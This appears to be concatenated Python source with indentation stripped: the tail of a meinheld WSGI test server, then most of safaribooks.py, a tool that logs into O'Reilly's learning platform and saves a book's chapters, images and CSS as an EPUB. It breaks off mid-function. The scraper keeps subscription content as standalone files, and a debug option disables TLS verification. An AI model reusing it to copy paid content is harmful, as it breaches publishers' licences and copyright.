response_headers = [('Content-type','text/plain'),('Content-Length',str(len(res)))]
start_response(status, response_headers)
# print environ
return [res]
def run(app, i):
meinheld.run(app)
def kill_all(sig, st):
for w in workers:
w.terminate()
def start(num=4):
for i in range(num):
p = Process(name="worker-%d" % i, target=run, args=(hello_world,i))
workers.append(p)
p.start()
signal.signal(signal.SIGTERM, kill_all)
meinheld.set_keepalive(10)
meinheld.set_access_logger(None)
meinheld.set_error_logger(None)
meinheld.listen(("0.0.0.0", 8000))
start()
|
safaribooks.py
|
#!/usr/bin/env python3
# coding: utf-8
import re
import os
import sys
import json
import shutil
import pathlib
import getpass
import logging
import argparse
import requests
import traceback
from html import escape
from random import random
from lxml import html, etree
from multiprocessing import Process, Queue, Value
from urllib.parse import urljoin, urlparse, parse_qs, quote_plus
PATH = os.path.dirname(os.path.realpath(__file__))
COOKIES_FILE = os.path.join(PATH, "cookies.json")
ORLY_BASE_HOST = "oreilly.com" # PLEASE INSERT URL HERE
SAFARI_BASE_HOST = "learning." + ORLY_BASE_HOST
API_ORIGIN_HOST = "api." + ORLY_BASE_HOST
ORLY_BASE_URL = "https://www." + ORLY_BASE_HOST
SAFARI_BASE_URL = "https://" + SAFARI_BASE_HOST
API_ORIGIN_URL = "https://" + API_ORIGIN_HOST
PROFILE_URL = SAFARI_BASE_URL + "/profile/"
# DEBUG
USE_PROXY = False
PROXIES = {"https": "https://127.0.0.1:8080"}
class Display:
BASE_FORMAT = logging.Formatter(
fmt="[%(asctime)s] %(message)s",
datefmt="%d/%b/%Y %H:%M:%S"
)
SH_DEFAULT = "\033[0m" if "win" not in sys.platform else "" # TODO: colors for Windows
SH_YELLOW = "\033[33m" if "win" not in sys.platform else ""
SH_BG_RED = "\033[41m" if "win" not in sys.platform else ""
SH_BG_YELLOW = "\033[43m" if "win" not in sys.platform else ""
def __init__(self, log_file):
self.output_dir = ""
self.output_dir_set = False
self.log_file = os.path.join(PATH, log_file)
self.logger = logging.getLogger("SafariBooks")
self.logger.setLevel(logging.INFO)
logs_handler = logging.FileHandler(filename=self.log_file)
logs_handler.setFormatter(self.BASE_FORMAT)
logs_handler.setLevel(logging.INFO)
self.logger.addHandler(logs_handler)
self.columns, _ = shutil.get_terminal_size()
self.logger.info("** Welcome to SafariBooks! **")
self.book_ad_info = False
self.css_ad_info = Value("i", 0)
self.images_ad_info = Value("i", 0)
self.last_request = (None,)
self.in_error = False
self.state_status = Value("i", 0)
sys.excepthook = self.unhandled_exception
def set_output_dir(self, output_dir):
self.info("Output directory:\n %s" % output_dir)
self.output_dir = output_dir
self.output_dir_set = True
def unregister(self):
self.logger.handlers[0].close()
sys.excepthook = sys.__excepthook__
def log(self, message):
try:
self.logger.info(str(message, "utf-8", "replace"))
except (UnicodeDecodeError, Exception):
self.logger.info(message)
def out(self, put):
pattern = "\r{!s}\r{!s}\n"
try:
s = pattern.format(" " * self.columns, str(put, "utf-8", "replace"))
except TypeError:
s = pattern.format(" " * self.columns, put)
sys.stdout.write(s)
def info(self, message, state=False):
self.log(message)
output = (self.SH_YELLOW + "[*]" + self.SH_DEFAULT if not state else
self.SH_BG_YELLOW + "[-]" + self.SH_DEFAULT) + " %s" % message
self.out(output)
def error(self, error):
if not self.in_error:
self.in_error = True
self.log(error)
output = self.SH_BG_RED + "[#]" + self.SH_DEFAULT + " %s" % error
self.out(output)
def exit(self, error):
self.error(str(error))
if self.output_dir_set:
output = (self.SH_YELLOW + "[+]" + self.SH_DEFAULT +
" Please delete the output directory '" + self.output_dir + "'"
" and restart the program.")
self.out(output)
output = self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Aborting..."
self.out(output)
self.save_last_request()
sys.exit(1)
def unhandled_exception(self, _, o, tb):
self.log("".join(traceback.format_tb(tb)))
self.exit("Unhandled Exception: %s (type: %s)" % (o, o.__class__.__name__))
def save_last_request(self):
if any(self.last_request):
self.log("Last request done:\n\tURL: {0}\n\tDATA: {1}\n\tOTHERS: {2}\n\n\t{3}\n{4}\n\n{5}\n"
.format(*self.last_request))
def intro(self):
output = self.SH_YELLOW + ("""
____ ___ _
/ __/__ _/ _/__ _____(_)
_\ \/ _ `/ _/ _ `/ __/ /
/___/\_,_/_/ \_,_/_/ /_/
/ _ )___ ___ / /__ ___
/ _ / _ \/ _ \/ '_/(_-<
/____/\___/\___/_/\_\/___/
""" if random() > 0.5 else """
██████╗ ██████╗ ██╗ ██╗ ██╗██████╗
██╔═══██╗ ██╔══██╗██║ ╚██╗ ██╔╝╚════██╗
██║ ██║ ██████╔╝██║ ╚████╔╝ ▄███╔╝
██║ ██║ ██╔══██╗██║ ╚██╔╝ ▀▀══╝
╚██████╔╝ ██║ ██║███████╗██║ ██╗
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
""") + self.SH_DEFAULT
output += "\n" + "~" * (self.columns // 2)
self.out(output)
def parse_description(self, desc):
if not desc:
return "n/d"
try:
return html.fromstring(desc).text_content()
except (html.etree.ParseError, html.etree.ParserError) as e:
self.log("Error parsing the description: %s" % e)
return "n/d"
def book_info(self, info):
description = self.parse_description(info.get("description", None)).replace("\n", " ")
for t in [
("Title", info.get("title", "")), ("Authors", ", ".join(aut.get("name", "") for aut in info.get("authors", []))),
("Identifier", info.get("identifier", "")), ("ISBN", info.get("isbn", "")),
("Publishers", ", ".join(pub.get("name", "") for pub in info.get("publishers", []))),
("Rights", info.get("rights", "")),
("Description", description[:500] + "..." if len(description) >= 500 else description),
("Release Date", info.get("issued", "")),
("URL", info.get("web_url", ""))
]:
self.info("{0}{1}{2}: {3}".format(self.SH_YELLOW, t[0], self.SH_DEFAULT, t[1]), True)
def state(self, origin, done):
progress = int(done * 100 / origin)
bar = int(progress * (self.columns - 11) / 100)
if self.state_status.value < progress:
self.state_status.value = progress
sys.stdout.write(
"\r " + self.SH_BG_YELLOW + "[" + ("#" * bar).ljust(self.columns - 11, "-") + "]" +
self.SH_DEFAULT + ("%4s" % progress) + "%" + ("\n" if progress == 100 else "")
)
def done(self, epub_file):
self.info("Done: %s\n\n" % epub_file +
" If you like it, please * this project on GitHub to make it known:\n"
" https://github.com/lorenzodifuccia/safaribooks\n"
" e don't forget to renew your Safari Books Online subscription:\n"
" " + SAFARI_BASE_URL + "\n\n" +
self.SH_BG_RED + "[!]" + self.SH_DEFAULT + " Bye!!")
@staticmethod
def api_error(response):
message = "API: "
if "detail" in response and "Not found" in response["detail"]:
message += "book's not present in Safari Books Online.\n" \
" The book identifier is the digits that you can find in the URL:\n" \
" `" + SAFARI_BASE_URL + "/library/view/book-name/XXXXXXXXXXXXX/`"
else:
os.remove(COOKIES_FILE)
message += "Out-of-Session%s.\n" % (" (%s)" % response["detail"]) if "detail" in response else "" + \
Display.SH_YELLOW + "[+]" + Display.SH_DEFAULT + \
" Use the `--cred` or `--login` options in order to perform the auth login to Safari."
return message
class WinQueue(list): # TODO: error while use `process` in Windows: can't pickle _thread.RLock objects
def put(self, el):
self.append(el)
def qsize(self):
return self.__len__()
class SafariBooks:
LOGIN_URL = ORLY_BASE_URL + "/member/auth/login/"
LOGIN_ENTRY_URL = SAFARI_BASE_URL + "/login/unified/?next=/home/"
API_TEMPLATE = SAFARI_BASE_URL + "/api/v1/book/{0}/"
BASE_01_HTML = "<!DOCTYPE html>\n" \
"<html lang=\"en\" xml:lang=\"en\" xmlns=\"http://www.w3.org/1999/xhtml\"" \
" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"" \
" xsi:schemaLocation=\"http://www.w3.org/2002/06/xhtml2/" \
" http://www.w3.org/MarkUp/SCHEMA/xhtml2.xsd\"" \
" xmlns:epub=\"http://www.idpf.org/2007/ops\">\n" \
"<head>\n" \
"{0}\n" \
"<style type=\"text/css\">" \
"body{{margin:1em;background-color:transparent!important;}}" \
"#sbo-rt-content *{{text-indent:0pt!important;}}#sbo-rt-content .bq{{margin-right:1em!important;}}"
KINDLE_HTML = "#sbo-rt-content *{{word-wrap:break-word!important;" \
"word-break:break-word!important;}}#sbo-rt-content table,#sbo-rt-content pre" \
"{{overflow-x:unset!important;overflow:unset!important;" \
"overflow-y:unset!important;white-space:pre-wrap!important;}}"
BASE_02_HTML = "</style>" \
"</head>\n" \
"<body>{1}</body>\n</html>"
CONTAINER_XML = "<?xml version=\"1.0\"?>" \
"<container version=\"1.0\" xmlns=\"urn:oasis:names:tc:opendocument:xmlns:container\">" \
"<rootfiles>" \
"<rootfile full-path=\"OEBPS/content.opf\" media-type=\"application/oebps-package+xml\" />" \
"</rootfiles>" \
"</container>"
# Format: ID, Title, Authors, Description, Subjects, Publisher, Rights, Date, CoverId, MANIFEST, SPINE, CoverUrl
CONTENT_OPF = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" \
"<package xmlns=\"http://www.idpf.org/2007/opf\" unique-identifier=\"bookid\" version=\"2.0\" >\n" \
"<metadata xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " \
" xmlns:opf=\"http://www.idpf.org/2007/opf\">\n" \
"<dc:title>{1}</dc:title>\n" \
"{2}\n" \
"<dc:description>{3}</dc:description>\n" \
"{4}" \
"<dc:publisher>{5}</dc:publisher>\n" \
"<dc:rights>{6}</dc:rights>\n" \
"<dc:language>en-US</dc:language>\n" \
"<dc:date>{7}</dc:date>\n" \
"<dc:identifier id=\"bookid\">{0}</dc:identifier>\n" \
"<meta name=\"cover\" content=\"{8}\"/>\n" \
"</metadata>\n" \
"<manifest>\n" \
"<item id=\"ncx\" href=\"toc.ncx\" media-type=\"application/x-dtbncx+xml\" />\n" \
"{9}\n" \
"</manifest>\n" \
"<spine toc=\"ncx\">\n{10}</spine>\n" \
"<guide><reference href=\"{11}\" title=\"Cover\" type=\"cover\" /></guide>\n" \
"</package>"
# Format: ID, Depth, Title, Author, NAVMAP
TOC_NCX = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"no\" ?>\n" \
"<!DOCTYPE ncx PUBLIC \"-//NISO//DTD ncx 2005-1//EN\"" \
" \"http://www.daisy.org/z3986/2005/ncx-2005-1.dtd\">\n" \
"<ncx xmlns=\"http://www.daisy.org/z3986/2005/ncx/\" version=\"2005-1\">\n" \
"<head>\n" \
"<meta content=\"ID:ISBN:{0}\" name=\"dtb:uid\"/>\n" \
"<meta content=\"{1}\" name=\"dtb:depth\"/>\n" \
"<meta content=\"0\" name=\"dtb:totalPageCount\"/>\n" \
"<meta content=\"0\" name=\"dtb:maxPageNumber\"/>\n" \
"</head>\n" \
"<docTitle><text>{2}</text></docTitle>\n" \
"<docAuthor><text>{3}</text></docAuthor>\n" \
"<navMap>{4}</navMap>\n" \
"</ncx>"
HEADERS = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Referer": LOGIN_ENTRY_URL,
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/90.0.4430.212 Safari/537.36"
}
COOKIE_FLOAT_MAX_AGE_PATTERN = re.compile(r'(max-age=\d*\.\d*)', re.IGNORECASE)
def __init__(self, args):
self.args = args
self.display = Display("info_%s.log" % escape(args.bookid))
self.display.intro()
self.session = requests.Session()
if USE_PROXY: # DEBUG
self.session.proxies = PROXIES
self.session.verify = False
self.session.headers.update(self.HEADERS)
self.jwt = {}
if not args.cred:
if not os.path.isfile(COOKIES_FILE):
self.display.exit("Login: unable to find `cookies.json` file.\n"
" Please use the `--cred` or `--login` options to perform the login.")
self.session.cookies.update(json.load(open(COOKIES_FILE)))
else:
self.display.info("Logging into Safari Books Online...", state=True)
self.do_login(*args.cred)
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, 'w'))
self.check_login()
self.book_id = args.bookid
self.api_url = self.API_TEMPLATE.format(self.book_id)
self.display.info("Retrieving book info...")
self.book_info = self.get_book_info()
self.display.book_info(self.book_info)
self.display.info("Retrieving book chapters...")
self.book_chapters = self.get_book_chapters()
self.chapters_queue = self.book_chapters[:]
if len(self.book_chapters) > sys.getrecursionlimit():
sys.setrecursionlimit(len(self.book_chapters))
self.book_title = self.book_info["title"]
self.base_url = self.book_info["web_url"]
self.clean_book_title = "".join(self.escape_dirname(self.book_title).split(",")[:2]) \
+ " ({0})".format(self.book_id)
books_dir = os.path.join(PATH, "Books")
if not os.path.isdir(books_dir):
os.mkdir(books_dir)
self.BOOK_PATH = os.path.join(books_dir, self.clean_book_title)
self.display.set_output_dir(self.BOOK_PATH)
self.css_path = ""
self.images_path = ""
self.create_dirs()
self.chapter_title = ""
self.filename = ""
self.chapter_stylesheets = []
self.css = []
self.images = []
self.display.info("Downloading book contents... (%s chapters)" % len(self.book_chapters), state=True)
self.BASE_HTML = self.BASE_01_HTML + (self.KINDLE_HTML if not args.kindle else "") + self.BASE_02_HTML
self.cover = False
self.get()
if not self.cover:
self.cover = self.get_default_cover() if "cover" in self.book_info else False
cover_html = self.parse_html(
html.fromstring("<div id=\"sbo-rt-content\"><img src=\"Images/{0}\"></div>".format(self.cover)), True
)
self.book_chapters = [{
"filename": "default_cover.xhtml",
"title": "Cover"
}] + self.book_chapters
self.filename = self.book_chapters[0]["filename"]
self.save_page_html(cover_html)
self.css_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book CSSs... (%s files)" % len(self.css), state=True)
self.collect_css()
self.images_done_queue = Queue(0) if "win" not in sys.platform else WinQueue()
self.display.info("Downloading book images... (%s files)" % len(self.images), state=True)
self.collect_images()
self.display.info("Creating EPUB file...", state=True)
self.create_epub()
if not args.no_cookies:
json.dump(self.session.cookies.get_dict(), open(COOKIES_FILE, "w"))
self.display.done(os.path.join(self.BOOK_PATH, self.book_id + ".epub"))
self.display.unregister()
if not self.display.in_error and not args.log:
os.remove(self.display.log_file)
def handle_cookie_update(self, set_cookie_headers):
for morsel in set_cookie_headers:
# Handle Float 'max-age' Cookie
if self.COOKIE_FLOAT_MAX_AGE_PATTERN.search(morsel):
cookie_key, cookie_value = morsel.split(";")[0].split("=")
self.session.cookies.set(cookie_key, cookie_value)
def requests_provider(self, url, is_post=False, data=None, perform_redirect=True, **kwargs):
try:
response = getattr(self.session, "post" if is_post else "get")(
url,
data=data,
allow_redirects=False,
**kwargs
)
self.handle_cookie_update(response.raw.headers.getlist("Set-Cookie"))
self.display.last_request = (
url, data, kwargs, response.status_code, "\n".join(
["\t{}: {}".format(*h) for h in response.headers.items()]
), response.text
)
except (requests.ConnectionError, requests.ConnectTimeout, requests.RequestException) as request_exception:
self.display.error(str(request_exception))
return 0
if response.is_redirect and perform_redirect:
return self.requests_provider(response.next.url, is_post, None, perform_redirect)
# TODO How about **kwargs?
return response
@staticmethod
def parse_cred(cred):
if ":" not in cred:
return False
sep = cred.index(":")
new_cred = ["", ""]
new_cred[0] = cred[:sep].strip("'").strip('"')
if "@" not in new_cred[0]:
return False
new_cred[1] = cred[sep + 1:]
return new_cred
def do_login(self, email, password):
response = self.requests_provider(self.LOGIN_ENTRY_URL)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
next_parameter = None
try:
next_parameter = parse_qs(urlparse(response.request.url).query)["next"][0]
except (AttributeError, ValueError, IndexError):
self.display.exit("Login: unable to complete login on Safari Books Online. Try again...")
redirect_uri = API_ORIGIN_URL + quote_plus(next_parameter)
response = self.requests_provider(
self.LOGIN_URL,
is_post=True,
json={
"email": email,
"password": password,
"redirect_uri": redirect_uri
},
perform_redirect=False
)
if response == 0:
self.display.exit("Login: unable to perform auth to Safari Books Online.\n Try again...")
if response.status_code != 200: # TODO To be reviewed
try:
error_page = html.fromstring(response.text)
errors_message = error_page.xpath("//ul[@class='errorlist']//li/text()")
recaptcha = error_page.xpath("//div[@class='g-recaptcha']")
messages = ([" `%s`" % error for error in errors_message
if "password" in error or "email" in error] if len(errors_message) else []) + \
([" `ReCaptcha required (wait or do logout from the website).`"] if len(
recaptcha) else [])
self.display.exit(
"Login: unable to perform auth login to Safari Books Online.\n" + self.display.SH_YELLOW +
"[*]" + self.display.SH_DEFAULT + " Details:\n" + "%s" % "\n".join(
messages if len(messages) else [" Unexpected error!"])
)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Login: your login went wrong and it encountered in an error"
" trying to parse the login details of Safari Books Online. Try again..."
)
self.jwt = response.json() # TODO: save JWT Tokens and use the refresh_token to restore user session
response = self.requests_provider(self.jwt["redirect_uri"])
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
def check_login(self):
response = self.requests_provider(PROFILE_URL, perform_redirect=False)
if response == 0:
self.display.exit("Login: unable to reach Safari Books Online. Try again...")
elif response.status_code != 200:
self.display.exit("Authentication issue: unable to access profile page.")
elif "user_type\":\"Expired\"" in response.text:
self.display.exit("Authentication issue: account subscription expired.")
self.display.info("Successfully authenticated.", state=True)
def get_book_info(self):
response = self.requests_provider(self.api_url)
if response == 0:
self.display.exit("API: unable to retrieve book info.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "last_chapter_read" in response:
del response["last_chapter_read"]
for key, value in response.items():
if value is None:
response[key] = 'n/a'
return response
def get_book_chapters(self, page=1):
response = self.requests_provider(urljoin(self.api_url, "chapter/?page=%s" % page))
if response == 0:
self.display.exit("API: unable to retrieve book chapters.")
response = response.json()
if not isinstance(response, dict) or len(response.keys()) == 1:
self.display.exit(self.display.api_error(response))
if "results" not in response or not len(response["results"]):
self.display.exit("API: unable to retrieve book chapters.")
if response["count"] > sys.getrecursionlimit():
sys.setrecursionlimit(response["count"])
result = []
result.extend([c for c in response["results"] if "cover" in c["filename"] or "cover" in c["title"]])
for c in result:
del response["results"][response["results"].index(c)]
result += response["results"]
return result + (self.get_book_chapters(page + 1) if response["next"] else [])
def get_default_cover(self):
response = self.requests_provider(self.book_info["cover"], stream=True)
if response == 0:
self.display.error("Error trying to retrieve the cover: %s" % self.book_info["cover"])
return False
file_ext = response.headers["Content-Type"].split("/")[-1]
with open(os.path.join(self.images_path, "default_cover." + file_ext), 'wb') as i:
for chunk in response.iter_content(1024):
i.write(chunk)
return "default_cover." + file_ext
def get_html(self, url):
response = self.requests_provider(url)
if response == 0 or response.status_code != 200:
self.display.exit(
"Crawler: error trying to retrieve this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
root = None
try:
root = html.fromstring(response.text, base_url=SAFARI_BASE_URL)
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Crawler: error trying to parse this page: %s (%s)\n From: %s" %
(self.filename, self.chapter_title, url)
)
return root
@staticmethod
def url_is_absolute(url):
return bool(urlparse(url).netloc)
@staticmethod
def is_image_link(url: str):
return pathlib.Path(url).suffix[1:].lower() in ["jpg", "jpeg", "png", "gif"]
def link_replace(self, link):
if link and not link.startswith("mailto"):
if not self.url_is_absolute(link):
if any(x in link for x in ["cover", "images", "graphics"]) or \
self.is_image_link(link):
image = link.split("/")[-1]
return "Images/" + image
return link.replace(".html", ".xhtml")
else:
if self.book_id in link:
return self.link_replace(link.split(self.book_id)[-1])
return link
@staticmethod
def get_cover(html_root):
lowercase_ns = etree.FunctionNamespace(None)
lowercase_ns["lower-case"] = lambda _, n: n[0].lower() if n and len(n) else ""
images = html_root.xpath("//img[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover') or"
"contains(lower-case(@alt), 'cover')]")
if len(images):
return images[0]
divs = html_root.xpath("//div[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(divs):
return divs[0]
a = html_root.xpath("//a[contains(lower-case(@id), 'cover') or contains(lower-case(@class), 'cover') or"
"contains(lower-case(@name), 'cover') or contains(lower-case(@src), 'cover')]//img")
if len(a):
return a[0]
return None
def parse_html(self, root, first_page=False):
if random() > 0.8:
if len(root.xpath("//div[@class='controls']/a/text()")):
self.display.exit(self.display.api_error(" "))
book_content = root.xpath("//div[@id='sbo-rt-content']")
if not len(book_content):
self.display.exit(
"Parser: book content's corrupted or not present: %s (%s)" %
(self.filename, self.chapter_title)
)
page_css = ""
if len(self.chapter_stylesheets):
for chapter_css_url in self.chapter_stylesheets:
if chapter_css_url not in self.css:
self.css.append(chapter_css_url)
self.display.log("Crawler: found a new CSS at %s" % chapter_css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(chapter_css_url))
stylesheet_links = root.xpath("//link[@rel='stylesheet']")
if len(stylesheet_links):
for s in stylesheet_links:
css_url = urljoin("https:", s.attrib["href"]) if s.attrib["href"][:2] == "//" \
else urljoin(self.base_url, s.attrib["href"])
if css_url not in self.css:
self.css.append(css_url)
self.display.log("Crawler: found a new CSS at %s" % css_url)
page_css += "<link href=\"Styles/Style{0:0>2}.css\" " \
"rel=\"stylesheet\" type=\"text/css\" />\n".format(self.css.index(css_url))
stylesheets = root.xpath("//style")
if len(stylesheets):
for css in stylesheets:
if "data-template" in css.attrib and len(css.attrib["data-template"]):
css.text = css.attrib["data-template"]
del css.attrib["data-template"]
try:
page_css += html.tostring(css, method="xml", encoding='unicode') + "\n"
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse one CSS found in this page: %s (%s)" %
(self.filename, self.chapter_title)
)
# TODO: add all not covered tag for `link_replace` function
svg_image_tags = root.xpath("//image")
if len(svg_image_tags):
for img in svg_image_tags:
image_attr_href = [x for x in img.attrib.keys() if "href" in x]
if len(image_attr_href):
svg_url = img.attrib.get(image_attr_href[0])
svg_root = img.getparent().getparent()
new_img = svg_root.makeelement("img")
new_img.attrib.update({"src": svg_url})
svg_root.remove(img.getparent())
svg_root.append(new_img)
book_content = book_content[0]
book_content.rewrite_links(self.link_replace)
xhtml = None
try:
if first_page:
is_cover = self.get_cover(book_content)
if is_cover is not None:
page_css = "<style>" \
"body{display:table;position:absolute;margin:0!important;height:100%;width:100%;}" \
"#Cover{display:table-cell;vertical-align:middle;text-align:center;}" \
"img{height:90vh;margin-left:auto;margin-right:auto;}" \
"</style>"
cover_html = html.fromstring("<div id=\"Cover\"></div>")
cover_div = cover_html.xpath("//div")[0]
cover_img = cover_div.makeelement("img")
cover_img.attrib.update({"src": is_cover.attrib["src"]})
cover_div.append(cover_img)
book_content = cover_html
self.cover = is_cover.attrib["src"]
xhtml = html.tostring(book_content, method="xml", encoding='unicode')
except (html.etree.ParseError, html.etree.ParserError) as parsing_error:
self.display.error(parsing_error)
self.display.exit(
"Parser: error trying to parse HTML of this page: %s (%s)" %
(self.filename, self.chapter_title)
)
return page_css, xhtml
@staticmethod
def escape_dirname(dirname, clean_space=False):
if ":" in dirname:
if dirname.index(":") > 15:
dirname = dirname.split(":")[0]
elif "win" in sys.platform:
dirname = dirname.replace(":", ",")
for ch in ['~', '#', '%', '&', '*', '{', '}', '\\', '<', '>', '?', '/', '`', '\'', '"', '|', '+', ':']:
if ch in dirname:
dirname = dirname.replace(ch, "_")
return dirname if not clean_space else dirname.replace(" ", "")
def create_dirs(self):
if os.path.isdir(self.BOOK_PATH):
self.display.log("Book directory already exists: %s" % self.BOOK_PATH)
else:
os.makedirs(self.BOOK_PATH)
oebps = os.path.join(self.BOOK_PATH, "OEBPS")
if not os.path.isdir(oebps):
self.display.book_ad_info = True
os.makedirs(oebps)
self.css_path = os.path.join(oebps, "Styles")
if os.path.isdir(self.css_path):
self.display.log("CSSs directory already exists: %s" % self.css_path)
else:
os.makedirs(self.css_path)
self.display.css_ad_info.value = 1
self.images_path = os.path.join(oebps, "Images")
if os.path.isdir(self.images_path):
self.display.log("Images directory already exists: %s" % self.images_path)
else:
os.makedirs(self.images_path)
self.display.images_ad_info.value = 1
def save_page_html(self, contents):
self.filename = self.filename.replace(".html", ".xhtml")
open(os.path.join(self.BOOK_PATH, "OEBPS", self.filename), "wb") \
.write(self.BASE_HTML.format(contents[0], contents[1]).encode("utf-8", 'xmlcharrefreplace'))
self.display.log("Created: %s" % self.filename)
def get(self):
len_books = len(self.book_chapters)
for _ in range(len_books):
if not len(self.chapters_queue):
return
first_page = len_books == len(self.chapters_queue)
next_chapter = self.chapters_queue.pop(0)
self.chapter_title = next_chapter["title"]
self.filename = next_chapter["filename"]
# Images
if "images" in next_chapter and len(next_chapter["images"]):
self.images.extend(urljoin(next_chapter['asset_base_url'], img_url)
for img_url in next_chapter['images'])
# Stylesheets
self.chapter_stylesheets = []
if "stylesheets" in next_chapter and len(next_chapter["stylesheets"]):
self.chapter_stylesheets.extend(x["url"] for x in next_chapter["stylesheets"])
if "site_styles" in next_chapter and len(next_chapter["site_styles"]):
self.chapter_stylesheets.extend(next_chapter["site_styles"])
if os.path.isfile(os.path.join(self.BOOK_PATH, "OEBPS", self.filename.replace(".html", ".xhtml"))):
if not self.display.book_ad_info and \
next_chapter not in self.book_chapters[:self.book_chapters.index(next_chapter)]:
self.display.info(
("File `%s` already exists.\n"
" If you want to download again all the book,\n"
" please delete the output directory '" + self.BOOK_PATH + "' and restart the program.")
% self.filename.replace(".html", ".xhtml")
)
self.display.book_ad_info = 2
else:
self.save_page_html(self.parse_html(self.get_html(next_chapter["content"]), first_page))
self.display.state(len_books, len_books - len(self.chapters_queue))
def _thread_download_css(self, url):
css_file = os.path.join(self.css_path, "Style{0:0>2}.css".format(self.css.index(url)))
if os.path.isfile(css_file):
if not self.display.css_ad_info.value and url not in self.css[:self.css.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the CSSs,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
css_file)
self.display.css_ad_info.value = 1
else:
response = self.requests_provider(url)
if response == 0:
self.display.error("Error trying to retrieve this CSS: %s\n From: %s" % (css_file, url))
with open(css_file, 'wb') as s:
s.write(response.content)
self.css_done_queue.put(1)
self.display.state(len(self.css), self.css_done_queue.qsize())
def _thread_download_images(self, url):
image_name = url.split("/")[-1]
image_path = os.path.join(self.images_path, image_name)
if os.path.isfile(image_path):
if not self.display.images_ad_info.value and url not in self.images[:self.images.index(url)]:
self.display.info(("File `%s` already exists.\n"
" If you want to download again all the images,\n"
" please delete the output directory '" + self.BOOK_PATH + "'"
" and restart the program.") %
image_name)
self.display.images_ad_info.value = 1
else:
response = self.requests_provider(urljoin(SAFARI_BASE_URL, url), stream=True)
if response == 0:
self.display.error("Error trying to retrieve this image: %s\n From: %s" % (image_name, url))
return
with open(image_path, 'wb') as img:
for chunk in response.iter_content(1024):
img.write(chunk)
self.images_done_queue.put(1)
self.display.state(len(self.images), self.images_done_queue.qsize())
def _start_multiprocessing(self, operation, full_queue):
if len(full_queue) > 5:
for i in range(0, len(full_queue), 5):
self._start_multiprocessing(operation, full_queue[i:i + 5])
else:
process_queue = [Process(target=operation, args=(arg,)) for arg in full_queue]
for proc in process_queue:
proc.start()
for proc in process_queue:
proc.join()
def collect_css(self):
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for css_url in self.css:
self._thread_download_css(css_url)
def collect_images(self):
if self.display.book_ad_info == 2:
self.display.info("Some of the book contents were already downloaded.\n"
" If you want to be sure that all the images will be downloaded,\n"
" please delete the output direcotry '" + self.BOOK_PATH +
"' and restart the program.")
self.display.state_status.value = -1
# "self._start_multiprocessing" seems to cause problem. Switching to mono-thread download.
for image_url in self.images:
self._thread_download_images(image_url)
def create_content_opf(self):
self.css = next(os.walk(self.css_path))[2]
self.images = next(os.walk(self.images_path))[2]
manifest = []
spine = []
for c in self.book_chapters:
c["filename"] = c["filename"].replace(".html", ".xhtml")
item_id = escape("".join(c["filename"].split(".")[:-1]))
manifest.append("<item id=\"{0}\" href=\"{1}\" media-type=\"application/xhtml+xml\" />".format(
item_id, c["filename"]
))
spine.append("<itemref idref=\"{0}\"/>".format(item_id))
for i in set(self.images):
dot_split = i.split(".")
head = "img_" + escape("".join(dot_split[:-1]))
extension = dot_split[-1]
manifest.append("<item id=\"{0}\" href=\"Images/{1}\" media-type=\"image/{2}\" />".format(
head, i, "jpeg" if "jp" in extension else extension
))
for i in range(len(self.css)):
manifest.append("<item id=\"style_{0:0>2}\" href=\"Styles/Style{0:0>2}.css\" "
"media-type=\"text/css\" />".format(i))
authors = "\n".join("<dc:creator opf:file-as=\"{0}\" opf:role=\"aut\">{0}</dc:creator>".format(
escape(aut.get("name", "n/d"))
) for aut in self.book_info.get("authors", []))
subjects = "\n".join("<dc:subject>{0}</dc:subject>".format(escape(sub.get("name", "n/d")))
for sub in self.book_info.get("subjects", []))
return self.CONTENT_OPF.format(
(self.book_info.get("isbn", self.book_id)),
escape(self.book_title),
authors,
escape(self.book_info.get("description", "")),
subjects,
", ".join(escape(pub.get("name", "")) for pub in self.book_info.get("publishers", [])),
escape(self.book_info.get("rights", "")),
self.book_info.get("issued", ""),
self.cover,
"\n".join(manifest),
"\n".join(spine),
self.book_chapters[0]["filename"].replace(".html", ".xhtml")
)
@staticmethod
def parse_toc(l, c=0, mx=0):
r = ""
for cc in l:
c += 1
if int(cc["depth"]) > mx:
mx = int(cc["depth"])
r += "<navPoint id=\"{0}\" playOrder=\"{1}\">" \
"<navLabel><text>{2}</text></navLabel>" \
"<content src=\"{3}\"/>".format(
cc["fragment"] if len(cc["fragment"]) else cc["id"], c,
escape(cc["label"]), cc["href"].replace(".html", ".xhtml").split("/")[-1]
)
if cc["children"]:
